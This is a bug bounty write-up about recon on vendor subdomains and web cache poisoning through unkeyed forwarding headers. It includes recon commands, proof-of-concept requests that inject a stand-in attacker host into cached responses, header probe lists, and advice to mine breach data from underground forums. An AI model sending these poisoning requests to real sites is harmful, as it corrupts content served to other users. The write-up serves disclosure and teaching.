Hey there! 😁

From Third-Party Recon to Cache Poisoning Chaos — A Bug Bounty Story That Went Way Too Far 😵‍💫💻

"You know adulthood is getting serious when your food delivery app knows your address better than your relatives… and somehow a random vendor subdomain knows even more." 🍔📦

I was supposed to be sleeping.

Instead, at 2:17 AM, I was staring at a forgotten vendor portal, three cups of cold coffee deep into recon, wondering why a JavaScript file was exposing internal AWS bucket names like it was handing out festival flyers.

That was the exact moment this bug bounty hunt stopped being "just another recon session" and turned into one of the craziest supply-chain intelligence rabbit holes I've ever followed. 🕳️🐇

Introduction: The Day I Stopped Looking at the Main Domain 👀

Most hunters focus only on the main application.

Big mistake.

Modern companies are giant LEGO structures made from:

  • third-party vendors
  • analytics providers
  • CRM tools
  • support dashboards
  • marketing platforms
  • CI/CD pipelines
  • CDN integrations
  • outsourced development portals
  • forgotten staging assets

And sometimes…

The weakest link isn't the company itself.

It's the vendor they forgot existed.

That's exactly what happened here.

What started as a simple recon session eventually exposed:

  • Internal vendor infrastructure
  • Leaked configuration files
  • Sensitive API routes
  • CDN behavior issues
  • Advanced web cache poisoning
  • Internal debug headers
  • Cross-environment asset reuse
  • Employee email patterns
  • Hidden authentication flows
  • Cloud storage references

…and eventually revealed the real target hiding behind the public application.

This write-up covers the full story, the methodology, the payloads, the recon workflow, and the exact thought process behind chaining low-signal findings into a high-impact report. 🔥

Phase 1 — Starting with Passive Recon 🛰️

Like every unhealthy bug bounty obsession, this started with recon.

But instead of attacking the primary application immediately, I focused on external intelligence.

The target company had:

  • multiple acquisitions
  • several vendor integrations
  • outsourced infrastructure
  • regional support systems
  • marketing automation providers

Which meant one thing:

Supply-chain exposure potential.

So I started collecting assets.

Subdomain Enumeration

subfinder -d target.com -silent | tee subs.txt
amass enum -passive -d target.com >> subs.txt
assetfinder --subs-only target.com >> subs.txt
sort -u subs.txt -o subs.txt

Then:

httpx -l subs.txt -tech-detect -title -status-code -follow-redirects

That immediately exposed weird hosts like:

vendor-assets.target.com
cdn-partner.target.com
support-sync.target.com
legacy-api.target.com
uat-marketing.target.com

Classic goldmine energy. ☕

Phase 2 — Following Third-Party Intelligence 🔍

Most people stop at subdomains.

I started pivoting externally.

Hunting Vendor References in JavaScript

I dumped JavaScript files:

katana -u https://target.com -jc -kf all -silent | tee js.txt

Then filtered the results for juicy references:

cat js.txt | grep -Ei "api|vendor|staging|token|auth|cdn|s3|internal"

That's when I noticed something interesting:

https://sync.vendor-cdn.net/internal-assets/

Internal-assets?

That name alone felt illegal. 😂

So naturally… I kept digging.

Phase 3 — CDN Fingerprinting & Hidden Behaviors 🌍

The vendor asset endpoint behaved strangely.

Different headers. Different cache responses. Different status handling.

So I fingerprinted the CDN behavior.

Header Analysis

curl -I https://vendor-assets.target.com

Interesting response:

X-Cache: HIT
Via: vendor-edge
X-Served-By: cache-xyz

Now things were getting fun.

I started testing:

  • cache normalization
  • host header behavior
  • reflected headers
  • unkeyed query handling
  • path confusion
  • encoded path traversal
  • internal rewrite behavior

Because modern cache poisoning is rarely about:

?test=evil

Real-world cache poisoning today often involves:

  • secondary key confusion
  • origin rewrite mismatches
  • normalization gaps
  • header parsing inconsistencies
  • internal proxy desync
  • CDN/origin disagreement

That's where the real bugs live.
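Several of those failure modes boil down to the CDN and the origin disagreeing about what a path means. Here is a minimal, purely illustrative Python sketch of one of them, a percent-decoding normalization gap; the handler names and routing rules are assumptions for demonstration, not the target's real stack:

```python
# Toy model of a normalization gap: the edge percent-decodes the path before
# building its cache key, while the origin routes on the raw, undecoded path.
# Result: the two layers can disagree about which resource a request is for.
from urllib.parse import unquote

def cdn_cache_key(host: str, raw_path: str) -> tuple:
    # Edge decodes %-escapes before keying (assumed behavior)
    return (host, unquote(raw_path))

def origin_route(raw_path: str) -> str:
    # Origin matches the literal prefix on the raw path (assumed behavior)
    return "static-handler" if raw_path.startswith("/static/") else "dynamic-handler"

raw = "/static%2F..%2Fapi/config"  # encoded traversal-style path

# The CDN keys this as /static/../api/config (looks static and cacheable)...
key = cdn_cache_key("vendor-assets.target.com", raw)

# ...but the origin never sees a /static/ prefix and serves it dynamically.
handler = origin_route(raw)

print(key, handler)
```

When the "static" cache key ends up holding a dynamic response, you have the raw material for cache deception and poisoning.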

Phase 4 — The Weird Header That Changed Everything 🧠

While replaying requests in Burp Repeater, I noticed something strange.

Adding a crafted forwarding header changed the backend response.

Initial Test

GET /static/app.js HTTP/1.1
Host: vendor-assets.target.com
X-Forwarded-Host: internal.target.local

Response:

X-Cache: MISS

Second request:

X-Cache: HIT

Interesting.

Very interesting.

The CDN was caching a response influenced by a forwarded header.

That meant:

  • header influence existed
  • cache key inconsistency existed
  • origin trust behavior existed

Now it was time to escalate.

Phase 5 — Advanced Cache Poisoning Recon ☣️

At this point, I moved into Burp Suite.

Tools used:

  • Repeater
  • Comparer
  • Logger++
  • Param Miner
  • Turbo Intruder
  • Collaborator

Param Miner Discovery

Param Miner discovered hidden input handling:

X-Rewrite-URL
X-Original-URL
X-Forwarded-Host
X-Host
Forwarded

That usually means reverse proxies are involved.

Which usually means danger. 😈

Phase 6 — Cache Key Confusion 🧩

The vulnerable behavior happened because:

  • The origin server trusted X-Forwarded-Host
  • The CDN cache key ignored it
  • The generated response reflected it

This caused poisoned responses to be cached globally.
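To make the mechanics concrete, here is a minimal toy model in Python of exactly that failure: the origin trusts the forwarded header, but the cache key ignores it. All names (`EdgeCache`, `origin_response`) are illustrative assumptions, not the vendor's actual software:

```python
# Toy model of unkeyed-header cache poisoning.

def origin_response(path: str, headers: dict) -> str:
    """Origin trusts X-Forwarded-Host when building absolute asset URLs."""
    asset_host = headers.get("X-Forwarded-Host", "vendor-assets.target.com")
    return f'<link rel="preload" href="https://{asset_host}{path}">'

class EdgeCache:
    """CDN keys entries on (host, path) only; the forwarded header is unkeyed."""
    def __init__(self):
        self.store = {}

    def fetch(self, host: str, path: str, headers: dict) -> str:
        key = (host, path)              # X-Forwarded-Host is NOT part of the key
        if key not in self.store:       # MISS: ask origin, then cache the body
            self.store[key] = origin_response(path, headers)
        return self.store[key]          # HIT: everyone gets the same body

cdn = EdgeCache()

# Attacker seeds the cache with a poisoned response...
poisoned = cdn.fetch("vendor-assets.target.com", "/fonts/main.woff2",
                     {"X-Forwarded-Host": "attacker-controlled-domain.example"})

# ...and an innocent user sending NO injected header now receives it too.
victim = cdn.fetch("vendor-assets.target.com", "/fonts/main.woff2", {})

assert "attacker-controlled-domain.example" in victim
```

One poisoned MISS is enough: every subsequent HIT serves the attacker's asset host until the entry expires.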

Proof-of-Concept

GET /assets/main.css HTTP/1.1
Host: vendor-assets.target.com
X-Forwarded-Host: attacker-controlled-domain.example

The response contained:

<link rel="preload" href="https://attacker-controlled-domain.example/fonts/main.woff2">

And the response was cached.

Meaning every future user requesting that asset inherited poisoned references.

That alone was impactful.

But the real issue was deeper.

Phase 7 — Internal Debug Routes Exposed 🚨

While fuzzing vendor paths:

ffuf -u https://vendor-assets.target.com/FUZZ -w raft-medium-directories.txt -fc 404

I discovered:

/debug
/internal
/assets-preview
/cache-status

The /cache-status endpoint leaked:

{
  "origin": "uat-storage.internal.vendor.local",
  "environment": "staging",
  "bucket": "vendor-uat-assets"
}

That was the turning point.

Because now:

  • internal infrastructure naming was exposed
  • staging environments were identified
  • cloud bucket patterns were visible
  • trust boundaries were collapsing

This wasn't just cache poisoning anymore.

This was infrastructure intelligence leakage.

Phase 8 — The Supply Chain Pivot 🔗

Now I started pivoting through third-party exposure.

Searching Historical Data

I checked:

  • Common Crawl
  • Wayback Machine
  • old JS snapshots
  • GitHub commits
  • leaked config patterns
  • public package references

One old JavaScript snapshot exposed:

api.sync-vendor.net/v2/internal/export

That endpoint returned:

{
  "environment":"production",
  "region":"ap-south-1"
}

Not critical alone.

But combined with:

  • vendor intelligence
  • cache poisoning
  • internal bucket names
  • leaked environment references

…it painted the full architecture map.

Phase 9 — Dark Web Intelligence & Breach Correlation 🕶️💀

Here's something most people ignore:

Dark web intelligence matters in recon.

A LOT.

Not because Hollywood hackers are typing green text in hoodies.

But because breached vendor data frequently exposes:

  • employee naming conventions
  • authentication portals
  • old credentials
  • VPN references
  • infrastructure screenshots
  • internal domains
  • Jira URLs
  • Okta identifiers
  • CDN provider details

During this engagement, I correlated vendor information with older breach discussions floating around underground forums.

One dataset referenced:

vendor-support-sync

The exact same naming convention appeared in:

support-sync.target.com

Now I knew:

  • the vendor relationship was real
  • infrastructure naming was reused
  • environment segmentation was weak

And this explained why the cache architecture behaved inconsistently across environments.

This is why breach intelligence matters.

Attackers already correlate this stuff.

Bug bounty hunters should too.

Phase 10 — Burp Suite Became My Best Friend 🧃

At this stage, Burp Suite looked less like a testing tool and more like a crime investigation board.

Every tab had:

  • weird headers
  • poisoned responses
  • staging routes
  • internal references
  • cache mismatches

Interesting Response Behavior

A crafted request:

GET /api/config HTTP/1.1
Host: vendor-assets.target.com
X-Forwarded-Host: cache-test.example

Returned:

{
  "assetHost":"https://cache-test.example"
}

And because the response was cacheable:

Cache-Control: public,max-age=600

…the poisoned JSON persisted for other users.

This could:

  • alter frontend asset loading
  • redirect dynamic resources
  • influence API consumers
  • expose sensitive logic
  • poison client-side configurations

This was no longer a "low severity cache issue."

This was a real-world supply-chain risk.

Phase 11 — Chaining the Impact 💥

Here's the thing about advanced bug bounty reports:

Single bugs rarely impress.

Chains do.

The final report combined:

  • Vendor intelligence leakage → Internal infrastructure exposure
  • CDN cache poisoning → Shared poisoned responses
  • Unkeyed header handling → Cross-user manipulation
  • Debug endpoint exposure → Environment disclosure
  • Third-party asset trust → Supply-chain abuse risk
  • Internal naming leaks → Recon acceleration

This transformed multiple "mediums" into one high-impact narrative.

And that's how modern bug bounty hunting works.

You don't hunt isolated bugs anymore.

You hunt ecosystems.


Reporting the Vulnerability 📩

The report focused heavily on:

  • business impact
  • realistic abuse paths
  • supply-chain trust implications
  • poisoned client responses
  • cross-user exposure risk
  • third-party architecture weaknesses

Instead of screaming:

OMG CACHE POISONING!!!

…I demonstrated:

  • how the vendor relationship amplified risk
  • how internal trust assumptions failed
  • how attackers could pivot through infrastructure leakage
  • how poisoned cache objects could affect downstream applications

That's what made the report stand out.

Lessons Learned 🧠

1. Vendors Are Part of the Attack Surface

Companies secure the front door.

Attackers check the delivery entrance.

2. Recon Wins More Bounties Than Exploitation

Fancy exploitation means nothing without:

  • context
  • intelligence
  • architecture understanding
  • pattern correlation

Recon is king. 👑

Practical Recon Tips for Hunters 🎯

Hunt for Vendor Clues in:

  • JavaScript comments
  • source maps
  • old assets
  • archived snapshots
  • CSP headers
  • email MX records
  • CDN CNAMEs
  • analytics scripts
  • support widgets

Test Cache Behavior Using:

  • X-Forwarded-Host
  • X-Original-URL
  • Forwarded
  • path normalization
  • encoded slashes
  • mixed casing
  • duplicate headers
  • alternate host representations
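A small generator script can keep those probes disciplined. This is a hedged sketch (the header list and URL are examples, not a definitive methodology): it emits one curl command per candidate header, each with a unique cache buster so a successful poison lands on a throwaway cache key instead of a real user's:

```python
# Generate per-header cache-poisoning probes, each isolated by a cache buster.
import uuid

CANDIDATE_HEADERS = [
    "X-Forwarded-Host",
    "X-Original-URL",
    "X-Rewrite-URL",
    "X-Host",
    "Forwarded",
]

def build_probes(base_url: str, canary: str) -> list:
    """Return one curl command per candidate header, each with a unique ?cb= buster."""
    cmds = []
    for header in CANDIDATE_HEADERS:
        buster = uuid.uuid4().hex[:8]
        # RFC 7239 "Forwarded" uses key=value pairs; the X-* headers take a bare host
        value = f"host={canary}" if header == "Forwarded" else canary
        cmds.append(f'curl -s -i "{base_url}?cb={buster}" -H "{header}: {value}"')
    return cmds

if __name__ == "__main__":
    for cmd in build_probes("https://vendor-assets.target.com/static/app.js",
                            "canary.example"):
        print(cmd)
```

Then check each response pair for your canary reflecting on a cached (HIT) copy; only after confirming reflection on a busted key should you reason about real-world impact.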

Useful Tools

subfinder
amass
httpx
katana
ffuf
nuclei
Param Miner
Turbo Intruder
waymore

Final Thoughts ☕

This hunt reminded me of something important:

Sometimes the real target isn't the company.

It's the invisible web of vendors, CDNs, integrations, and forgotten infrastructure surrounding it.

And once you start following those connections…

You stop seeing applications.

You start seeing ecosystems.

That's where the best bug bounty stories begin. 🔥

Connect with Me!

  • Instagram: @rev_shinchan
  • Gmail: rev30102001@gmail.com

#EnnamPolVazhlkai😇

#BugBounty, #CyberSecurity, #InfoSec, #Hacking, #WebSecurity, #CTF